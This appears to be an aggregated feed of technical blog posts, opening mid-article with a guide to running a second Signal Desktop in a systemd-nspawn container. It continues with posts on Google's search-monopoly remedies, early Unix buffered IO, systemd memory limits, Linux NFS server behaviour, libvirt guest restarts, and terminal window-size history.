GrapheneOS supports multiple user profiles (up to 31, plus a so-called guest profile), which are completely separated from each other. This means you can install different applications in different profiles, keep entirely different contact lists, use one VPN in one profile and a different one (or none at all) in another, and so on.

The solution is therefore simple. On a phone running GrapheneOS we create a new profile, install a fresh copy of Signal there, insert a second SIM card into the phone, and register Signal with the new number.

Once the phone number is registered, we can remove the SIM card and put the old one back in. Signal only uses the data connection for communication (and of course the phone can also be used without any SIM card, on WiFi alone). The phone now has two copies of Signal installed, tied to two different phone numbers, and we can send messages (even between the two of them!) or make calls from both.

Although the profiles are separated, we can configure notifications from the Signal app in the second profile to be delivered even while we are logged into the first profile. Only for writing messages or making calls do we have to switch to the right profile on the phone.

Simple, right?

Running multiple copies of Signal on a computer

Now we would of course like something similar on the computer. In short, we want to be able to run two different instances of Signal (each tied to its own phone number) on one computer, under a single user account.

At first glance this is slightly more complicated, but with the help of virtualization the problem can be solved elegantly. Of course we won't run a whole new virtual machine just for Signal; we can use a so-called container instead.

On Linux, we first install the systemd-container package (on Ubuntu systems it is already installed by default).

On the host computer we enable so-called unprivileged user namespaces: run sudo nano /etc/sysctl.d/nspawn.conf and put the following into the file:

kernel.unprivileged_userns_clone=1

Now we reload systemd and restart the systemd-sysctl service:

sudo systemctl daemon-reload
sudo systemctl restart systemd-sysctl.service
sudo systemctl status systemd-sysctl.service
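
To check that the setting took effect, we can read the value back (the kernel.unprivileged_userns_clone knob is a Debian/Ubuntu kernel addition, so it may not exist on other distributions):

sysctl kernel.unprivileged_userns_clone

This should print kernel.unprivileged_userns_clone = 1.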

Next we can install debootstrap: sudo apt install debootstrap.

Now we create a new container into which we will install Debian (specifically the stable release); in reality only the minimal required parts of the operating system will be installed:

sudo debootstrap --include=systemd,dbus stable /var/lib/machines/debian

We get roughly the following output:

I: Keyring file not available at /usr/share/keyrings/debian-archive-keyring.gpg; switching to https mirror https://deb.debian.org/debian
I: Retrieving InRelease 
I: Retrieving Packages 
I: Validating Packages 
I: Resolving dependencies of required packages...
I: Resolving dependencies of base packages...
I: Checking component main on https://deb.debian.org/debian...
I: Retrieving adduser 3.134
I: Validating adduser 3.134
...
...
...
I: Configuring tasksel-data...
I: Configuring libc-bin...
I: Configuring ca-certificates...
I: Base system installed successfully.

The container with the Debian operating system is now installed, so we boot it and set the root user's password:

sudo systemd-nspawn -D /var/lib/machines/debian -U --machine debian

We get the output:

Spawning container debian on /var/lib/machines/debian.
Press Ctrl-] three times within 1s to kill container.
Selected user namespace base 1766326272 and range 65536.
root@debian:~#

Now, connected to the container's operating system through this virtual terminal, we enter the following two commands:

passwd
printf 'pts/0\npts/1\n' >> /etc/securetty 

The first command sets the password, while the second enables logins via a so-called local terminal (TTY). Finally we type the logout command to log out and return to the host computer.

Now we need to configure the networking the container will use. The simplest approach is to just use the host computer's network. Enter the following two commands:

sudo mkdir /etc/systemd/nspawn
sudo nano /etc/systemd/nspawn/debian.nspawn

Enter the following into the file:

[Network]
VirtualEthernet=no

Now we start the container again with the command sudo systemctl start systemd-nspawn@debian, or even more simply - machinectl start debian.
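
If we also want the container to come up automatically at boot, machinectl can enable it (this simply enables the matching systemd-nspawn@debian service unit; it's optional, and nothing later in this guide depends on it):

sudo machinectl enable debian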

We can also view the list of running containers:

machinectl list
MACHINE CLASS     SERVICE        OS     VERSION ADDRESSES
debian  container systemd-nspawn debian 12      -        

1 machines listed.

Or we can log into this virtual container: machinectl login debian. We get the output:

Connected to machine debian. Press ^] three times within 1s to exit session.

Debian GNU/Linux 12 cryptopia pts/1

cryptopia login: root
Password: 

The output shows that we logged in as the root user with the password we set earlier.

Now we install Signal Desktop in this container:

apt update
apt install wget gpg

wget -O- https://updates.signal.org/desktop/apt/keys.asc | gpg --dearmor > /usr/share/keyrings/signal-desktop-keyring.gpg

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/desktop/apt xenial main' | tee /etc/apt/sources.list.d/signal-xenial.list

apt update
apt install --no-install-recommends signal-desktop
halt

The last command shuts the container down. A fresh copy of the Signal Desktop application is now installed in it.
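
Alternatively, instead of running halt inside the container, we can ask for the same clean shutdown from the host side:

machinectl poweroff debian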

By the way, if we want, we can rename the container to a friendlier name, e.g. sudo machinectl rename debian debian-signal. Of course, we will then have to use that same name when working with the container (so, machinectl login debian-signal).

Now we create a script that starts the container and launches Signal Desktop inside it in such a way that its window shows up on the host computer's desktop.

Create the file with nano /opt/runContainerSignal.sh (saving it in, for example, the /opt directory); its contents are as follows:

#!/bin/sh
xhost +local:
pkexec systemd-nspawn --setenv=DISPLAY=:0 \
                      --bind-ro=/tmp/.X11-unix/  \
                      --private-users=pick \
                      --private-users-chown \
                      -D /var/lib/machines/debian-signal/ \
                      --as-pid2 signal-desktop --no-sandbox
xhost -local:

With the first xhost command we allow connections to our display, but only from the local computer; the second xhost command blocks these connections (to the display) again. Make the script executable (chmod +x /opt/runContainerSignal.sh), and that's it.

Two Signal Desktop application icons

Well, not quite yet, since we would have to launch the script from a terminal; starting it by clicking an icon is far more convenient.

So let's make a .desktop file: nano ~/.local/share/applications/runContainerSignal.desktop. Put the following content into it:

[Desktop Entry]
Type=Application
Name=Signal Container
Exec=/opt/runContainerSignal.sh
Icon=security-high
Terminal=false
Comment=Run Signal Container

…instead of the security-high icon we can use a different one, for example:

Icon=/usr/share/icons/Yaru/scalable/status/security-high-symbolic.svg

A note: the .desktop file is stored in ~/.local/share/applications/, so it is accessible only to this specific user and not to all users on the computer.

Now make the .desktop file executable: chmod +x ~/.local/share/applications/runContainerSignal.desktop

Refresh the so-called desktop entries: update-desktop-database ~/.local/share/applications/, and that's it!

Two Signal Desktop application instances

When we type “Signal Container” into the application search, the application's icon will appear, and clicking it starts Signal in the container (starting it will require entering a password, though).

Now we just link this Signal Desktop with the copy of Signal on the phone, and we can use two copies of the Signal Desktop application on the computer.

What about…?

Unfortunately, in the setup described, access to the camera and audio does not work. So we will still have to make calls from the phone.

It turns out that hooking the container up to the host's PipeWire audio system and camera is incredibly complicated (at least in my system setup). If you have a hint on how to solve this, you are of course welcome to let me know. :)

Mozilla Is Worried About the Proposed Fixes for Google’s Search Monopoly

By: Nick Heer

Michael Kan, PC Magazine:

Mozilla points to a key but less eye-catching proposal from the DOJ to regulate Google’s search business, which a judge ruled as a monopoly in August. In their recommendations, federal prosecutors urged the court to ban Google from offering “something of value” to third-party companies to make Google the default search engine over their software or devices. 

“The proposed remedies are designed to end Google’s unlawful practices and open up the market for rivals and new entrants to emerge,” the DOJ told the court. The problem is that Mozilla earns most of its revenue from royalty deals — nearly 86% in 2022 — making Google the default Firefox browser search engine.

This is probably another reason why U.S. prosecutors want to jettison Chrome from Google: they want to reduce any benefit it may accrue from trying to fix its illegal search monopoly. But it seems Google’s position in the industry is so entrenched that correcting it will hurt lots of other businesses, too. That does not mean it should not be broken up or that the DOJ’s proposed remedies are wrong, however.

⌥ Permalink

Unix's buffered IO in assembly and in C

By: cks

Recently on the Fediverse, I said something related to Unix's pre-V7 situation with buffered IO:

[...]

(I think the V1 approach is right for an assembly based minimal OS, while the stdio approach kind of wants malloc() and friends.)

The V1 approach, as documented in its putc.3 and getw.3 manual pages, is that the caller to the buffered IO routines supplies the data area used for buffering, and the library functions merely initialize it and later use it. How you get the data area is up to you and your program; you might, for example, simply have a static block of memory in your BSS segment. You can dynamically allocate this area if you want to, but you don't have to. The V2 and later putchar have a similar approach but this time they contain a static buffer area and you just have to do a bit of initialization (possibly putchar was in V1 too, I don't know for sure).

Stdio of course has a completely different API. In stdio, you don't provide the data area; instead, stdio provides you an opaque reference (a 'FILE *') to the information and buffers it maintains internally. This is an interface that definitely wants some degree of dynamic memory allocation, for example for the actual buffers themselves, and in modern usage most of the FILE objects will be dynamically allocated too.

(The V7 stdio implementation had a fixed set of FILE structs and so would error out if you used too many of them. However, it did use malloc() for the buffer associated with them, in filbuf.c and flsbuf.c.)

You can certainly do dynamic memory allocation in assembly, but I think it's much more natural in C, and certainly the C standard library is more heavyweight than the relatively small and minimal assembly language stuff early Unix programs (written in assembly) seem to have required. So I think it makes a lot of sense that Unix started with a buffering approach where the caller supplies the buffer (and probably doesn't dynamically allocate it), then moved to one where the library does at least some allocation and supplies the buffer (and other data) itself.

Buffered IO in Unix before V7 introduced stdio

By: cks

I recently read Julia Evans' Why pipes sometimes get "stuck": buffering. Part of the reason is that almost every Unix program does some amount of buffering for what it prints (or writes) to standard output and standard error. For C programs, this buffering is built into the standard library, specifically into stdio, which includes familiar functions like printf(). Stdio is one of the many things that appeared first in Research Unix V7. This might leave you wondering if this sort of IO was buffered in earlier versions of Research Unix and if it was, how it was done.

The very earliest version of Research Unix is V1, and in V1 there is putc.3 (at that point entirely about assembly, since C was yet to come). This set of routines allows you to set up and then use a 'struct' to implement IO buffering for output. There is a similar set of buffered functions for input, in getw.3, and I believe the memory blocks the two sets of functions use are compatible with each other. The V1 manual pages note it as a bug that the buffer wasn't 512 bytes, but also notes that several programs would break if the size was changed; the buffer size will be increased to 512 bytes by V3.

In V2, I believe we still have putc and getw, but we see the first appearance of another approach, in putchr.s. This implements putchar(), which is used by printf() and which (from later evidence) uses an internal buffer (under some circumstances) that has to be explicitly flush()'d by programs. In V3, there's manual pages for putc.3 and getc.3 that are very similar to the V1 versions, which is why I expect these were there in V2 as well. In V4, we have manual pages for both putc.3 (plus getc.3) and putch[a]r.3, and there is also a getch[a]r.3 that's the input version of putchar(). Since we have a V4 manual page for putchar(), we can finally see the somewhat tangled way it works, rather than having to read the PDP-11 assembly. I don't have links to V5 manuals, but the V5 library source says that we still have both approaches to buffered IO.

(If you want to see how the putchar() approach was used, you can look at, for example, the V6 grep.c, which starts out with the 'fout = dup(1);' that the manual page suggests for buffered putchar() usage, and then periodically calls flush().)

In V6, there is a third approach that was added, in /usr/source/iolib, although I don't know if any programs used it. Iolib has a global array of structs, that were statically associated with a limited number of low-numbered file descriptors; an iolib function such as cflush() would be passed a file descriptor and use that to look up the corresponding struct. One innovation iolib implicitly adds is that its copen() effectively 'allocates' the struct for you, in contrast to putc() and getc(), where you supply the memory area and fopen()/fcreate() merely initialize it with the correct information.

Finally V7 introduces stdio and sorts all of this out, at the cost of some code changes. There's still getc() and putc(), but now they take a FILE *, instead of their own structure, and you get the FILE * from things like fopen() instead of supplying it yourself and having a stdio function initialize it. Putchar() (and getchar()) still exist but are now redone to work with stdio buffering instead of their own buffering, and 'flush()' has become fflush() and takes an explicit FILE * argument instead of implicitly flushing putchar()'s buffer, and generally it's not necessary any more. The V7 grep.c still uses printf(), but now it doesn't explicitly flush anything by calling fflush(); it just trusts in stdio.

Using systemd-run to limit something's memory usage in cgroups v2

By: cks

Once upon a time I wrote an entry about using systemd-run to limit something's RAM consumption. This was back in the days of cgroups v1 (also known as 'non-unified cgroups'), and we're now in the era of cgroups v2 ('unified cgroups') and also ZRAM based swap. This means we want to make some adjustments, especially if you're dealing with programs with obnoxiously large RAM usage.

As before, the basic thing you want to do is run your program or thing in a new systemd user scope, which is done with 'systemd-run --user --scope ...'. You may wish to give it a unit name as well, '--unit <name>', especially if you expect it to persist a while and you want to track it specifically. Systemd will normally automatically clean up this scope when everything in it exits, and the scope is normally connected to your current terminal and otherwise more or less acts normally as an interactive process.

To actually do anything with this, we need to set some systemd resource limits. To limit memory usage, the minimum is a MemoryMax= value. It may also work better to set MemoryHigh= to a value somewhat below the absolute limit of MemoryMax. If you're worried about whatever you're doing running your system out of memory and your system uses ZRAM based swap, you may also want to set a MemoryZSwapMax= value so that the program doesn't chew up all of your RAM by 'swapping' it to ZRAM and filling that up. Without a ZRAM swap limit, you might find that the program actually uses MemoryMax RAM plus your entire ZRAM swap RAM, which might be enough to trigger a more general OOM. So this might be:

systemd-run --user --scope -p MemoryHigh=7G -p MemoryMax=8G -p MemoryZSwapMax=1G ./mach build

(Good luck with building Firefox in merely 8 GBytes of RAM, though. And obviously if you do this regularly, you're going to want to script it.)

If you normally use ZRAM based swap and you're worried about the program running you out of memory that way, you may want to create some actual swap space that the program can be turned loose on. These days, this is as simple as creating a 'swap.img' file somewhere and then swapping onto it:

cd /
dd if=/dev/zero of=swap.img bs=1MiB count=$((4*1024))
chmod 600 swap.img
mkswap swap.img
swapon /swap.img
(You can use swapoff to stop swapping to this image file after you're done running your big program.)

Then you may want to also limit how much of this swap space the program can use, which is done with a MemorySwapMax= value. I've read both systemd's documentation and the kernel's cgroup v2 memory controller documentation, and I can't tell whether the ZRAM swap maximum is included in the swap maximum or is separate. I suspect that it's included in the swap maximum, but if it really matters you should experiment.

If you also want to limit the program's CPU usage, there are two options. The easiest one to set is CPUQuota=. The drawback of CPU quota limits is that programs may not realize that they're being restricted by such a limit and wind up running a lot more threads (or processes) than they should, increasing the chances of overloading things. The more complex but more legible to programs way is to restrict what CPUs they can run on using taskset(1).

(While systemd has AllowedCPUs=, this is a cgroup setting and doesn't show up in the interface used by taskset and sched_getaffinity(2).)
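
As a concrete sketch of the two approaches (the 200% quota and the CPU list are arbitrary example values, not recommendations):

systemd-run --user --scope -p CPUQuota=200% ./mach build
taskset -c 0-3 ./mach build

The first caps the scope at two CPUs' worth of time without programs being able to see the limit; the second confines the program to CPUs 0 through 3 in a way that sched_getaffinity(2) aware thread pools will notice.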

Systemd also has CPUWeight=, but I have limited experience with it; see fair share scheduling in cgroup v2 for what I know. You might want the special value 'idle' for very low priority programs.

What NFS server threads do in the Linux kernel

By: cks

If we ignore the network stack and take an abstract view, the Linux kernel NFS server needs to do things at various different levels in order to handle NFS client requests. There is NFS specific processing (to deal with things like the NFS protocol and NFS filehandles), general VFS processing (including maintaining general kernel information like dentries), then processing in whatever specific filesystem you're serving, and finally some actual IO if necessary. In the abstract, there are all sorts of ways to split up the responsibility for these various layers of processing. For example, if the Linux kernel supported fully asynchronous VFS operations (which it doesn't), the kernel NFS server could put all of the VFS operations in a queue and let the kernel's asynchronous 'IO' facilities handle them and notify it when a request's VFS operations were done. Even with synchronous VFS operations, you could split the responsibility between some front end threads that handled the NFS specific side of things and a backend pool of worker threads that handled the (synchronous) VFS operations.

(This would allow you to size the two pools differently, since ideally they have different constraints. The NFS processing is more or less CPU bound, and so sized based on how much of the server's CPU capacity you wanted to use for NFS; the VFS layer would ideally be IO bound, and could be sized based on how much simultaneous disk IO it was sensible to have. There is some hand-waving involved here.)

The actual, existing Linux kernel NFS server takes the much simpler approach. The kernel NFS server threads do everything. Each thread takes an incoming NFS client request (or a group of them), does NFS level things like decoding NFS filehandles, and then calls into the VFS to actually do operations. The VFS will call into the filesystem, still in the context of the NFS server thread, and if the filesystem winds up doing IO, the NFS server thread will wait for that IO to complete. When the thread of execution comes back out of the VFS, the NFS thread then does the NFS processing to generate replies and dispatch them to the network.

This unfortunately makes it challenging to answer the question of how many NFS server threads you want to use. The NFS server threads may be CPU bound (if they're handling NFS requests from RAM and the VFS's caches and data structures), or they may be IO bound (as they wait for filesystem IO to be performed, usually for reading and writing files). When you're IO bound, you probably want enough NFS server threads so that you can wait on all of the IO and still have some threads left over to handle the collection of routine NFS requests that can be satisfied from RAM. When you're CPU bound, you don't want any more NFS server threads than you have CPUs, and maybe you want a bit less.

If you're lucky, your workload is consistently and predictably one or the other. If you're not lucky (and we're not), your workload can be either of these at different times or (if we're really out of luck) both at once. Energetic people with NFS servers that have no other real activity can probably write something that automatically tunes the number of NFS threads up and down in response to a combination of the load average, the CPU utilization, and pressure stall information.

(We're probably just going to set it to the number of system CPUs.)

(After yesterday's question I decided I wanted to know for sure what the kernel's NFS server threads were used for, just in case. So I read the kernel code, which did have some useful side effects such as causing me to learn that the various nfsd4_<operation> functions we sometimes use bpftrace on are doing less than I assumed they were.)
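
For example, a starting point for this sort of poking around might be a bpftrace one-liner that counts calls to those handlers (this assumes your kernel exposes the nfsd4_* function names to kprobes):

bpftrace -e 'kprobe:nfsd4_* { @[probe] = count(); }'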

The question of how many NFS server threads you should use (on Linux)

By: cks

Today, not for the first time, I noticed that one of our NFS servers was sitting at a load average of 8 with roughly half of its overall CPU capacity used. People with experience in Linux NFS servers are now confidently predicting that this is a 16-CPU server, which is correct (it has 8 cores and 2 HT threads per core). They're making this prediction because the normal Linux default number of kernel NFS server threads to run is eight.

(Your distribution may have changed this, and if so it's most likely by changing what's in /etc/nfs.conf, which is the normal place to set this. It can be changed on the fly by writing a new value to /proc/fs/nfsd/threads.)
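
For example, to change the thread count on the fly and check it:

echo 16 | sudo tee /proc/fs/nfsd/threads
cat /proc/fs/nfsd/threads

To make it persistent, set it in /etc/nfs.conf (the [nfsd] section is where current versions expect it):

[nfsd]
threads=16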

Our NFS server wasn't saturating its NFS server threads because someone on a NFS client was doing a ton of IO. That might actually have slowed the requests down. Instead, there were some number of programs that were constantly making some number of NFS requests that could be satisfied entirely from (server) RAM, which explains why all of the NFS kernel threads were busy using system CPU (mostly on a spinlock, apparently, according to 'perf top'). It's possible that some of these constant requests came from code that was trying to handle hot reloading, since this is one of the sources of constant NFS 'GetAttr' requests, but I believe there's other things going on.

(Since this is the research side of a university department, we have very little visibility into what the graduate students are running on places like our little SLURM cluster.)

If you search around the Internet, you can find all sorts of advice about what to set the number of NFS server threads to on your Linux NFS server. Many of them involve relatively large numbers (such as this 2024 SuSE advice of 128 threads). Having gone through this recent experience, my current belief is that it depends on what your problem is. In our case, with the NFS server threads all using kernel CPU time and not doing much else, running more threads than we have CPUs seems pointless; all it would do is create unproductive contention for CPU time. If NFS clients are going to totally saturate the fileserver with (CPU-eating) requests even at 16 threads, possibly we should run fewer threads than CPUs, so that user level management operations have some CPU available without contending against the voracious appetite of the kernel NFS server.

(Some advice suggests some number of server NFS kernel threads per NFS client. I suspect this advice is not used in places with tens or hundreds of NFS clients, which is our situation.)

To figure out what your NFS server's problem is, I think you're going to need to look at things like pressure stall information and information on the IO rate and the number of IO requests you're seeing. You can't rely on overall iowait numbers, because Linux iowait is a conservative lower bound. IO pressure stall information is much better for telling you if some NFS threads are blocked on IO even while others are active.
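
The system-wide pressure stall numbers live in /proc/pressure, so a quick look is just:

cat /proc/pressure/io

A consistently non-zero 'full' line there is a decent sign that at least some tasks (possibly NFS server threads) are completely stalled on IO at times.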

(Unfortunately the kernel NFS threads are not in a cgroup of their own, so you can't get per-cgroup pressure stall information for them. I don't know if you can manually move them into a cgroup, or if systemd would cooperate with this if you tried it.)

PS: In theory it looks like a potentially reasonable idea to run roughly at least as many NFS kernel threads as you have CPUs (maybe a few less so you have some user level CPU left over). However, if you have a lot of CPUs, as you might on modern servers, this might be too many if your NFS server gets flooded with an IO-heavy workload. Our next generation NFS fileserver hardware is dual socket, 12 cores per socket, and 2 threads per core, for a total of 48 CPUs, and I'm not sure we want to run anywhere near that many NFS kernel threads. Although we probably do want to run more than eight.

Ubuntu LTS (server) releases have become fairly similar to each other

By: cks

Ubuntu 24.04 LTS was released this past April, so one of the things we've been doing since then is building out our install system for 24.04 and then building a number of servers using 24.04, both new servers and servers that used to be built on 20.04 or 22.04. What has been quietly striking about this process is how few changes there have been for us between 20.04, 22.04, and 24.04. Our customization scripts needed only very small changes, and many of the instructions for specific machines could be revised by just searching and replacing either '20.04' or '22.04' with '24.04'.

Some of this lack of changes is illusory, because when I actually look at the differences between our 22.04 and 24.04 postinstall scripting, there are a number of changes, adjustments, and new fixes (and a big change in having to install Python 2 ourselves). Even when we didn't do anything there were decisions to be made, like whether or not we would stick with the Ubuntu 24.04 default of socket activated SSH (our decision so far is to stick with 24.04's default for less divergence from upstream). And there were also some changes to remove obsolete things and restructure how we change things like the system-wide SSH configuration; these aren't forced by the 22.04 to 24.04 change, but building the install setup for a new release is the right time to rethink existing pieces.

However, plenty of this lack of changes is real, and I credit a lot of that to systemd. Systemd has essentially standardized a lot of the init process and in the process, substantially reduced churn in it. For a relevant example, our locally developed systemd units almost never need updating between Ubuntu versions; if it worked in 20.04, it'll still work just as well in 24.04 (including its relationships to various other units). Another chunk of this lack of changes is that the current 20.04+ Ubuntu server installer has maintained a stable configuration file and relatively stable feature set (at least of features that we want to use), resulting in very little needing to be modified in our spin of it as we moved from 20.04 to 22.04 to 24.04. And the experience of going through the server installer has barely changed; if you showed me an installer screen from any of the three releases, I'm not sure I could tell you which it's from.

I generally feel that this is a good thing, at least on servers. A normal Linux server setup and the software that you run on it has broadly reached a place of stability, where there's no particular need to make really visible changes or to break backward compatibility. It's good for us that moving from 20.04 to 22.04 to 24.04 is mostly about getting more recent kernels and more up to date releases of various software packages, and sometimes having bugs fixed so that things like bpftrace work better.

(Whether this is 'welcome maturity' or 'unwelcome stasis' is probably somewhat in the eye of the observer. And there are quiet changes afoot behind the scenes, like the change from iptables to nftables.)

Complications in supporting 'append to a file' in a NFS server

By: cks

In the comments of my entry on the general problem of losing network based locks, an interesting side discussion has happened between commentator abel and me over NFS servers (not) supporting the Unix O_APPEND feature. The more I think about it, the more I think it's non-trivial to support well in an NFS server and that there are some subtle complications (and probably more that I haven't realized). I'm mostly going to restrict this to something like NFS v3, which is what I'm familiar with.

The basic Unix semantics of O_APPEND are that when you perform a write(), all of your data is immediately and atomically put at the current end of the file, and the file's size and maximum offset are immediately extended to the end of your data. If you and I do a single append write() of 128 Mbytes to the same file at the same time, either all of my 128 Mbytes winds up before yours or vice versa; your and my data will never wind up intermingled.

This basic semantics is already a problem for NFS because NFS (v3) connections have a maximum size for single NFS 'write' operations and that size may be (much) smaller than the user level write(). Without a multi-operation transaction of some sort, we can't reliably perform append write()s of more data than will fit in a NFS write operation; either we fail those 128 Mbyte writes, or we have the possibility that data from you and I will be intermingled in the file.

In NFS v2, all writes were synchronous (or were supposed to be, servers sometimes lied about this). NFS v3 introduced the idea of asynchronous, buffered writes that were later committed by clients. NFS servers are normally permitted to discard asynchronous writes that haven't yet been committed by the client; when the client tries to commit them later, the NFS server rejects the commit and the client resends the data. This works fine when the client's request has a definite position in the file, but it has issues if the client's request is a position-less append write. If two clients do append writes to the same file, first A and then B after it, the server discards both, and then client B is the first one to go through the 'COMMIT, fail, resend' process, where does its data wind up? It's not hard to wind up with situations where a third client that's repeatedly reading the file will see inconsistent results, where first it sees A's data then B's and then later either it sees B's data before A's or B's data without anything from A (not even a zero-filled gap in the file, the way you'd get with ordinary writes).

(While we can say that NFS servers shouldn't ever deliberately discard append writes, one of the ways that this happens is that the server crashes and reboots.)

You can get even more fun ordering issues created by retrying lost writes if there is another NFS client involved that is doing manual append writes by finding out the current end of file and writing at it. If A and B do append writes, C does a manual append write, all writes are lost before they're committed, B redoes, C redoes, and then A redoes, a natural implementation could easily wind up with B's data, an A data sized hole, C's data, and then A's data appended after C's.

This also creates server side ordering dependencies for potentially discarding uncommitted asynchronous write data, ones that a NFS server can normally make independently. If A appended a lot of data and then B appended a little bit, you probably don't want to discard A's data but not B's, because there's no guarantee that A will later show up to fail a COMMIT and resend it (A could have crashed, for example). And if B requests a COMMIT, you probably want to commit A's data as well, even if there's much more of it.

One way around this would be to adopt a more complex model of append writes over NFS, where instead of the client requesting an append write, it requests 'write this here but fail if this is not the current end of file'. This would give all NFS writes a definite position in the file at the cost of forcing client retries on the initial request (if the client later has to repeat the write because of a failed commit, it must carefully strip this flag off). Unfortunately a file being appended to from multiple clients at a high rate would probably result in a lot of client retries, with no guarantee that a given client would ever actually succeed.

(You could require all append writes to be synchronous, but then this would do terrible things to NFS server performance for potentially common use of append writes, like appending log lines to a shared log file from multiple machines. And people absolutely would write and operate programs like that if append writes over NFS were theoretically reliable.)

Losing NFS locks and the SunOS SIGLOST signal

By: cks

NFS is a network filesystem that famously also has a network locking protocol associated with it (or part of it, for NFSv4). This means that NFS has to consider the issue of the NFS client losing a lock that it thinks it holds. In NFS, clients losing locks normally happens as part of NFS(v3) lock recovery, triggered when a NFS server reboots. On server reboot, clients are told to re-acquire all of their locks, and this re-acquisition can explicitly fail (as well as going wrong in various ways that are one way to get stuck NFS locks). When a NFS client's kernel attempts to reclaim a lock and this attempt fails, it has a problem. Some process on the local machine thinks that it holds a (NFS) lock, but as far as the NFS server and other NFS clients are concerned, it doesn't.

Sun's original version of NFS dealt with this problem with a special signal, SIGLOST. When the NFS client's kernel detected that a NFS lock had been lost, it sent SIGLOST to whatever process held the lock. SIGLOST was a regular signal, so by default the process would exit abruptly; a process that wanted to do something special could register a signal handler for SIGLOST and then do whatever it could. SIGLOST appeared no later than SunOS 3.4 (cf) and still lives on today in Illumos, where you can find this discussed in uts/common/klm/nlm_client.c and uts/common/fs/nfs/nfs4_recovery.c (and it's also mentioned in fcntl(2)). The popularity of actually handling SIGLOST may be indicated by the fact that no program in the Illumos source tree seems to set a signal handler for it.

Other versions of Unix mainly ignore the situation. The Linux kernel has a specific comment about this in fs/lockd/clntproc.c, which very briefly talks about the issue and picks ignoring it (apart from logging the kernel message "lockd: failed to reclaim lock for ..."). As far as I can tell from reading FreeBSD's sys/nlm/nlm_advlock.c, FreeBSD silently ignores any problems when it goes through the NFS client process of reclaiming locks.

(As far as I can see, NetBSD and OpenBSD don't support NFS locks on clients at all, rendering the issue moot. I don't know if POSIX locks fail on NFS mounted filesystems or if they work but create purely local locks on that particular NFS client, although I think it's the latter.)

On the surface this seems rather bad, and certainly worse than the Sun approach of SIGLOST. However, I'm not sure that SIGLOST is all that great either, because it has some problems. First, what you can do in a signal handler is very constrained; basically all that a SIGLOST handler can do is set a variable and hope that the rest of the code will check it before it does anything dangerous. Second, programs may hold multiple (NFS) locks and SIGLOST doesn't tell you which lock you lost; as far as I know, there's no way of telling. If your program gets a SIGLOST, all you can do is assume that you lost all of your locks. Third, file locking may quite reasonably be used inside libraries in a way that is hidden from callers by the library's API, but signals and handling signals is global to the entire program. If taking a file lock inside a library exposes the entire program to SIGLOST, you have a collection of problems (which ones depend on whether the program has its own file locks and whether or not it has installed a SIGLOST handler).

This collection of problems may go part of the way to explain why no Illumos programs actually set a SIGLOST handler and why other Unixes simply ignore the issue. A kernel that uses SIGLOST essentially means 'your program dies if it loses a lock', and it's not clear that this is better than 'your program optimistically continues', especially in an environment where a NFS client losing a NFS lock is rare (and letting the program continue is certainly simpler for the kernel).

A rough equivalent to "return to last power state" for libvirt virtual machines

By: cks

Physical machines can generally be set in their BIOS so that if power is lost and then comes back, the machine returns to its previous state (either powered on or powered off). The actual mechanics of this are complicated (also), but the idealized version is easily understood and convenient. These days I have a revolving collection of libvirt based virtual machines running on a virtualization host that I periodically reboot due to things like kernel updates, and for a while I have quietly wished for some sort of similar libvirt setting for its virtual machines.

It turns out that this setting exists, sort of, in the form of the libvirt-guests systemd service. If enabled, it can be set to restart all guests that were running when the system was shut down, regardless of whether or not they're set to auto-start on boot (none of my VMs are). This is a global setting that applies to all virtual machines that were running at the time the system went down, not one that can be applied to only some VMs, but for my purposes this is sufficient; it makes it less of a hassle to reboot the virtual machine host.

Linux being Linux, life is not quite this simple in practice, as is illustrated by comparing my Ubuntu VM host machine with my Fedora desktops. On Ubuntu, libvirt-guests.service defaults to enabled, it is configured through /etc/default/libvirt-guests (the Debian standard), and it defaults to not automatically restarting virtual machines. On my Fedora desktops, libvirt-guests.service is not enabled by default, it is configured through /etc/sysconfig/libvirt-guests (as in the official documentation), and it defaults to automatically restarting virtual machines. Another difference is that Ubuntu has a /etc/default/libvirt-guests that has commented out default values, while Fedora has no /etc/sysconfig/libvirt-guests so you have to read the script to see what the defaults are (on Fedora, this is /usr/libexec/libvirt-guests.sh, on Ubuntu /usr/lib/libvirt/libvirt-guests.sh).

I've changed my Ubuntu VM host machine so that it will automatically restart previously running virtual machines on reboot, because generally I leave things running intentionally there. I haven't touched my Fedora machines so far because by and large I don't have any regularly running VMs, so if a VM is still running when I go to reboot the machine, it's most likely because I forgot I had it up and hadn't gotten around to shutting it off.
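
For the record, the change amounts to editing /etc/default/libvirt-guests so that the relevant variables read something like this (these are standard libvirt-guests settings; 'shutdown' makes guests shut down cleanly on host shutdown instead of being suspended):

ON_BOOT=start
ON_SHUTDOWN=shutdown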

(My pre-libvirt virtualization software was much too heavy-weight for me to leave a VM running without noticing, but libvirt VMs have a sufficiently low impact on my desktop experience that I can and have left them running without realizing it.)

The history of Unix's ioctl and signal about window sizes

By: cks

One of the somewhat obscure features of Unix is that the kernel has a specific interface to get (and set) the 'window size' of your terminal, and can also send a Unix signal to your process when that size changes. The official POSIX interface for the former is tcgetwinsize(), but in practice actual Unixes have a standard tty ioctl for this, TIOCGWINSZ (see eg Linux ioctl_tty(2) (also) or FreeBSD tty(4)). The signal is officially standardized by POSIX as SIGWINCH, which is the name it always has had. Due to a Fediverse conversation, I looked into the history of this today, and it turns out to be more interesting than I expected.

(The inclusion of these interfaces in POSIX turns out to be fairly recent.)

As far as I can tell, 4.2 BSD did not have either TIOCGWINSZ or SIGWINCH (based on its sigvec(2) and tty(4) manual pages). Both of these appear in the main BSD line in 4.3 BSD, where sigvec(2) has added SIGWINCH (as the first new signal along with some others) and tty(4) has TIOCGWINSZ. This timing makes a certain amount of sense in Unix history. At the time of 4.2 BSD's development and release, people were connecting to Unix systems using serial terminals, which had more or less fixed sizes that were covered by termcap's basic size information. By the time of 4.3 BSD in 1986, Unix workstations existed and with them, terminal windows that could have their size changed on the fly; a way of finding out (and changing) this size was an obvious need, along with a way for full-screen programs like vi to get notified if their terminal window was resized on the fly.

However, as far as I can tell 4.3 BSD itself did not originate SIGWINCH, although it may be the source of TIOCGWINSZ. The FreeBSD project has manual pages for a variety of Unixes, including 'Sun OS 0.4', which seems to be an extremely early release from early 1983. This release has a signal(2) with a SIGWINCH signal (using signal number 28, which is what 4.3 BSD will use for it), but no (documented) TIOCGWINSZ. However, it does have some programs that generate custom $TERMCAP values with the right current window sizes.

